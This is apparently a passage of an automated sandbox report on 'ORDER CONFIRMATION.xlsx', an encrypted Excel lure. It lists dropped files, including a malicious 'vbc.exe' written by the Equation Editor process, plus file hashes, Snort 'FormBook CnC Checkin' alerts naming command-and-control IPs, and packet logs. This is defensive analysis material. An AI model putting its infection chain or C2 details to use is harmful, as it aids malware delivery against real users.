                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83C4F71D.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B4ED7E41.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3FA08B4.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4E1B898.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):7006
                                                                                      Entropy (8bit):7.000232770071406
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                                                                                      MD5:971312D4A6C9BE9B496160215FE59C19
                                                                                      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                                                                                      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                                                                                      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CFE3BF36.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):648132
                                                                                      Entropy (8bit):2.8123866129936412
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:M34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:+4UcLe0JOcXuunhqcS
                                                                                      MD5:113F32E1934BC0E35EEE5FF818BE29A2
                                                                                      SHA1:5A8B1604EE71AB705333F8801B4257ABFFCD0201
                                                                                      SHA-256:DEDBE06A88A213D59E39F84939526B4ECCAD8ED4EC26BD9FE3CD748F33090511
                                                                                      SHA-512:4D2D418011596BE9A4F05BA424016F22B8FFBEBA7D552A17D722D42C6BA2D3ACE88BECD19E13B488AF22EC6731AA4ADC565F3A9017918646099D859597D9D3F1
                                                                                      Malicious:false
                                                                                      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$.......-z.X.@..%...h....................N0Z............x........N0Z........ ....y.X........ ............z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X.......<..............vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6282740.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5DAEFB9.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F90639BF.emf
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                      Category:dropped
                                                                                      Size (bytes):7788
                                                                                      Entropy (8bit):5.523444764822477
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:wHCHOvlJaX1/0qMfZoL/GuoOfaDda/ZbjsSZdb3Cim3n+KeXI:wHTrZuloOSGZboS/C93n+KuI
                                                                                      MD5:19CEE3A6741FA847BB3B6049C6D44989
                                                                                      SHA1:D3AB8B9DE9780CD057FC1E210C47533A2E3EA704
                                                                                      SHA-256:DF50928E8F40F0258DA68BFFD210760789C670101AFC17CC6C8334DD0313A66F
                                                                                      SHA-512:2C7B73617C55D99B3C70ECB8B0904A056AEDEF193066208A514FAD02B6C5F53F803FC196E40C72DB03EB4980314305FF3D53342117623F711EE97967EFD9E4AE
                                                                                      Malicious:false
                                                                                      Preview: ....l...).......u...<.........../....... EMF....l...........................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I.....................................................6.).X.....{.d...........................p....\.............|....p.......<5.u..p....`.p....$y.w............8.....w....$.....r.d...........^.p.....^.p................-...d...<.w................<.9u.Z.v....X.\...............................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD>^JHCcNJFfNJFiPMHlRPJoTPLrWQLvYRPxZUR{]XP~]WS.^ZS.`[T.c\U.e^U.e]W.g`Y.hbY.j`Y.ib\.ld].kd].nd^.nf^.
                                                                                      C:\Users\user\Desktop\~$ORDER CONFIRMATION.xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):556544
                                                                                      Entropy (8bit):7.182791197610268
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
                                                                                      MD5:989933E361010648C467C6D7B6C2D812
                                                                                      SHA1:3BD47D097B8CD69083445EB0417B0059FA806542
                                                                                      SHA-256:34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
                                                                                      SHA-512:F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.988579713004966
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:ORDER CONFIRMATION.xlsx
                                                                                      File size:597504
                                                                                      MD5:e1e18c326feb4aea3a983f390e0e36c2
                                                                                      SHA1:7d0abdd1c61dac8dfb411fde050381149fa1aaff
                                                                                      SHA256:a53f9cefce2fc02da9726d54387b05952a3956b9da65c6927c96250b44099d9a
                                                                                      SHA512:60b789ed55e1b4129b6cb7a9f57e463cb4f21a77ba0f9060269618df6c0035c7bd70e8fe8fabb8ca44435f098acbf9f38d6a7aead6f7a4bf7202eced0592b416
                                                                                      SSDEEP:12288:52/yYOLyJMy9tyEqnF8VPv8+BRZlJf+jgGpVABfGiggRBZ:52/Tg+ryGVPv3ZlF+jgGpVAlGqR7
                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/15/21-11:18:05.138832 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 34.102.136.180 | 192.168.2.22
09/15/21-11:18:10.217119 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:18:10.217119 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:18:10.217119 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49170 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:18:10.331685 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49170 | 34.98.99.30 | 192.168.2.22
09/15/21-11:18:20.416021 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:18:20.416021 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:18:20.416021 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49171 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:18:20.531202 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49171 | 34.102.136.180 | 192.168.2.22
09/15/21-11:18:30.822018 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:18:30.822018 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:18:30.822018 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49173 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:19:13.272679 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49176 | 34.102.136.180 | 192.168.2.22
09/15/21-11:19:54.712455 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49180 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:19:54.712455 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49180 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:19:54.712455 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49180 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:19:54.827491 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49180 | 34.102.136.180 | 192.168.2.22
09/15/21-11:20:05.010582 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49182 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:05.010582 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49182 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:05.010582 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49182 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:05.125579 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49182 | 34.102.136.180 | 192.168.2.22
09/15/21-11:20:15.480022 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49184 | 34.102.136.180 | 192.168.2.22
09/15/21-11:20:20.496012 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49185 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:20:20.496012 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49185 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:20:20.496012 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49185 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:20:20.611011 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49185 | 34.98.99.30 | 192.168.2.22
09/15/21-11:20:30.639824 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49186 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:30.639824 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49186 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:30.639824 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49186 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:20:30.756136 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49186 | 34.102.136.180 | 192.168.2.22
09/15/21-11:20:49.990019 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49188 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:20:49.990019 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49188 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:20:49.990019 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49188 | 80 | 192.168.2.22 | 184.168.131.241
09/15/21-11:22:05.612250 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49191 | 34.102.136.180 | 192.168.2.22
09/15/21-11:22:43.718801 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49195 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:43.718801 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49195 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:43.718801 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49195 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:43.833789 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49195 | 34.102.136.180 | 192.168.2.22
09/15/21-11:22:53.937608 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49197 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:53.937608 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49197 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:53.937608 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49197 | 80 | 192.168.2.22 | 34.102.136.180
09/15/21-11:22:54.053650 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49197 | 34.102.136.180 | 192.168.2.22
09/15/21-11:23:04.410658 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49199 | 34.102.136.180 | 192.168.2.22
09/15/21-11:23:09.429910 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49200 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:23:09.429910 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49200 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:23:09.429910 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49200 | 80 | 192.168.2.22 | 34.98.99.30
09/15/21-11:23:09.545253 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49200 | 34.98.99.30 | 192.168.2.22

                                                                                      Network Port Distribution

                                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 11:16:35.175262928 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.287193060 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.291636944 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.291671038 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.411237955 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.411433935 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.413852930 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.413883924 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.413907051 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.414019108 CEST | 49167 | 80 | 192.168.2.22 | 198.23.212.143
Sep 15, 2021 11:16:35.525995970 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526036978 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526066065 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526093006 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
Sep 15, 2021 11:16:35.526125908 CEST | 80 | 49167 | 198.23.212.143 | 192.168.2.22
